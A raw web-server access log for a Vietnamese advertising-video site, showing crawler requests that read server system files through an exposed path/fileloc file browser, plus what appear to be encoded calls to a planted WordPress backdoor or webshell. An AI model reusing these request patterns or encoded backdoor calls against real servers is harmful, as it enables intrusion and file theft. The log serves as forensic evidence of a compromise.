74.7.227.51 - - [09/Nov/2025:00:14:26 +0000] "GET /q-~157tOiFqwfoDQMohiHINYUm8w0LLCZBuz43590/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.227.180.70 - - [09/Nov/2025:00:14:28 +0000] "GET /our-works/tvc-relax-gaba/?path=//etc/apache2/fastpanel2-available HTTP/1.0" 200 2895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.167.144.160 - - [09/Nov/2025:00:14:30 +0000] "GET /?products=700409684 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:14:30 +0000] "GET /q-~160MuefOguELjV5wavDYacKBJmhxc1lOB28083/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:14:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/smaps&path=//proc/23 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:14:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory5/subsystem/drivers HTTP/1.0" 200 2983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:14:33 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Frtc%2Fdrv%2Fabeoz9.h&path=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Frtc%2Fdrv HTTP/1.0" 200 2894 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.217.177.142 - - [09/Nov/2025:00:14:33 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/rsync&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:12:16 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303733362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634373133362q6135393733663862363632343230636431643066353630313935323132343064222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:00:14:37 +0000] "GET /q-~197tl6OaQkAffsSUT1xMDcHMeRdpcykLw49234/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.82.63.147 - - [09/Nov/2025:00:14:38 +0000] "GET /our-works/intracom-riverside/?fileloc=//bin/byobu-launcher-uninstall&path=//bin HTTP/1.0" 200 3712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:14:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/smaps_rollup&path=//proc/23 HTTP/1.0" 200 2827 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:14:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/memory4/subsystem/devices/memory4/subsystem/devices HTTP/1.0" 200 3688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.2.4.213 - - [09/Nov/2025:00:14:41 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//lib/systemd/systemd-networkd&path=//lib/systemd HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:00:14:41 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fsystemd%2Ftmp.mount&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fsystemd HTTP/1.0" 200 3335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:14:41 +0000] "GET /q-~133kd7KqraQTYJH2wanZtMRkqCkSsufLZ25852/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:14:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/memory4/subsystem/devices/memory4/subsystem/drivers HTTP/1.0" 200 2983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:14:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/stack&path=//proc/23 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.235.158.162 - - [09/Nov/2025:00:14:43 +0000] "GET /our-works/tvc-jokky/?fileloc=//etc/default/mdadm&path=//etc/default HTTP/1.0" 200 3262 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:14:46 +0000] "GET /q-~133kd7KqraQTYJH2wanZtMRkqCkSsufLZ25852/?path=/var/www/lamphim/data/www/lamphimquangcao.net/96cf65 HTTP/1.0" 200 3282 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:14:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory5/subsystem/devices HTTP/1.0" 200 3688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.4.229.9 - - [09/Nov/2025:00:14:50 +0000] "GET /our-works/tvc-jokky/?fileloc=//sys/kernel/kexec_crash_loaded&path=//sys/kernel HTTP/1.0" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:14:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/stat&path=//proc/23 HTTP/1.0" 200 2898 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.167.144.160 - - [09/Nov/2025:00:14:54 +0000] "GET /?products=1092027656 HTTP/1.0" 200 26915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:14:55 +0000] "GET /q-~133kd7KqraQTYJH2wanZtMRkqCkSsufLZ25852/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.4.76.156 - - [09/Nov/2025:00:14:56 +0000] "GET /our-works/tvc-jokky/?fileloc=//etc/rc0.d/K01iscsid&path=//etc/rc0.d HTTP/1.0" 200 3597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:14:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory0/subsystem/devices HTTP/1.0" 200 3692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:14:58 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fkernel%2Fdrivers%2Fnet%2Fmii.ko&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fkernel%2Fdrivers%2Fnet HTTP/1.0" 200 2874 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.195.50.71 - - [09/Nov/2025:00:15:01 +0000] "GET /our-works/corporate/marina-plaza/?fileloc=//bin/bzcmp&path=//bin HTTP/1.0" 500 185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:12:40 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303735382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634373135382q3463396464613933353935353266653163656538636162363639626661373438222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
79.137.67.30 - - [09/Nov/2025:00:15:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/statm&path=//proc/23 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:15:02 +0000] "GET /q-~157tOiFqwfoDQMohiHINYUm8w0LLCZBuz43590/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.179.120 - - [09/Nov/2025:00:15:03 +0000] "GET /our-works/tvc-jokky/?fileloc=//bin/pod2usage&path=//bin HTTP/1.0" 200 4558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:15:04 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory8/power HTTP/1.0" 200 3585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.234.200.207 - - [09/Nov/2025:00:15:05 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/rev&path=//usr/bin HTTP/1.0" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:15:06 +0000] "GET /q-~160MuefOguELjV5wavDYacKBJmhxc1lOB28083/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:15:06 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/status&path=//proc/23 HTTP/1.0" 200 3124 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
100.29.155.89 - - [09/Nov/2025:00:15:08 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/rev&path=//usr/bin HTTP/1.0" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:15:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory0/subsystem/devices HTTP/1.0" 200 3692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:15:10 +0000] "GET /q-~197tl6OaQkAffsSUT1xMDcHMeRdpcykLw49234/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:15:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/syscall&path=//proc/23 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:15:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory0/power HTTP/1.0" 200 3585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.197.82.195 - - [09/Nov/2025:00:15:13 +0000] "GET /our-works/tvc-jokky/?fileloc=//bin/rgrep&path=//bin HTTP/1.0" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:00:15:15 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fsound%2Fsoc%2Fkirkwood HTTP/1.0" 200 3249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:15:15 +0000] "GET /q-~234PkvCOobmYpMgH3eWBmWX1fQACZYmEs33905/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.201.155.215 - - [09/Nov/2025:00:15:16 +0000] "GET /our-works/tvc-kimino/?fileloc=//usr/bin/locale&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:15:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/memory4/subsystem/devices/memory6/power HTTP/1.0" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:15:18 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/timers&path=//proc/23 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:15:21 +0000] "GET /q-~133kd7KqraQTYJH2wanZtMRkqCkSsufLZ25852/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/images/toggige-arrow.jpg&path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 17435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.162.69.192 - - [09/Nov/2025:00:15:21 +0000] "GET /our-works/tvc-nuoc-mam-thai-long/?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:15:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory0/subsystem/devices/memory7 HTTP/1.0" 500 820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:13:03 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303738322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634373138322q3565346365313162636633383539333933383065663864653530313631306366222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
79.137.67.30 - - [09/Nov/2025:00:15:24 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/timerslack_ns&path=//proc/23 HTTP/1.0" 200 2827 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.94.156.104 - - [09/Nov/2025:00:15:25 +0000] "GET /our-works/tvc-kimino/?path=//lib/python3.8/logging HTTP/1.0" 200 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:15:25 +0000] "GET /q-~197tl6OaQkAffsSUT1xMDcHMeRdpcykLw49234/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.154.211 - - [09/Nov/2025:00:15:26 +0000] "GET /q-~69dqeg8F5L6ndH0t2UdbzauWouNvaP2t26498/ HTTP/1.0" 200 4760 "https://lamphimquangcao.net/sitemap348.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.189 - - [09/Nov/2025:00:15:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/memory4/subsystem/devices/memory4/power HTTP/1.0" 200 3582 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [09/Nov/2025:00:13:28 +0000] "GET /wp-includes/addc3d4c/edit.php?id=401440 HTTP/1.0" 200 166 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=401440" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
52.1.106.130 - - [09/Nov/2025:00:15:27 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//var/log/dpkg.log.1&path=//var/log HTTP/1.0" 200 3436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:15:27 +0000] "GET /q-~160MuefOguELjV5wavDYacKBJmhxc1lOB28083/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.18 - - [09/Nov/2025:00:15:27 +0000] "GET /?products=401724906 HTTP/1.0" 200 24676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:15:28 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/uid_map&path=//proc/23 HTTP/1.0" 200 2838 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:15:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory0/power HTTP/1.0" 200 3586 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:15:29 +0000] "GET /q-~197tl6OaQkAffsSUT1xMDcHMeRdpcykLw49234/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
207.46.13.168 - - [09/Nov/2025:00:15:28 +0000] "GET /?products=1824357038 HTTP/1.0" 200 26375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
34.231.181.240 - - [09/Nov/2025:00:15:29 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//var/log/dpkg.log.1&path=//var/log HTTP/1.0" 200 3436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:15:31 +0000] "GET /q-~133kd7KqraQTYJH2wanZtMRkqCkSsufLZ25852/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:15:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/23/wchan&path=//proc/23 HTTP/1.0" 200 2822 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:15:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory5 HTTP/1.0" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:15:35 +0000] "GET /q-~157tOiFqwfoDQMohiHINYUm8w0LLCZBuz43590/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:15:35 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fmisc%2Fsgi-xp HTTP/1.0" 200 3231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
23.23.180.225 - - [09/Nov/2025:00:15:36 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/mail&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:15:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/memory5/subsystem/devices/memory5/power HTTP/1.0" 200 3583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:15:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/231/arch_status&path=//proc/231 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:15:40 +0000] "GET /q-~157tOiFqwfoDQMohiHINYUm8w0LLCZBuz43590/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.231.77.232 - - [09/Nov/2025:00:15:40 +0000] "GET /our-works/tvc-jokky/?fileloc=//bin/grep&path=//bin HTTP/1.0" 200 2809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:15:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/memory5/subsystem/devices/memory9 HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.235.172.96 - - [09/Nov/2025:00:15:44 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/mail&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:15:45 +0000] "GET /q-~234PkvCOobmYpMgH3eWBmWX1fQACZYmEs33905/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:15:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/231/autogroup&path=//proc/231 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
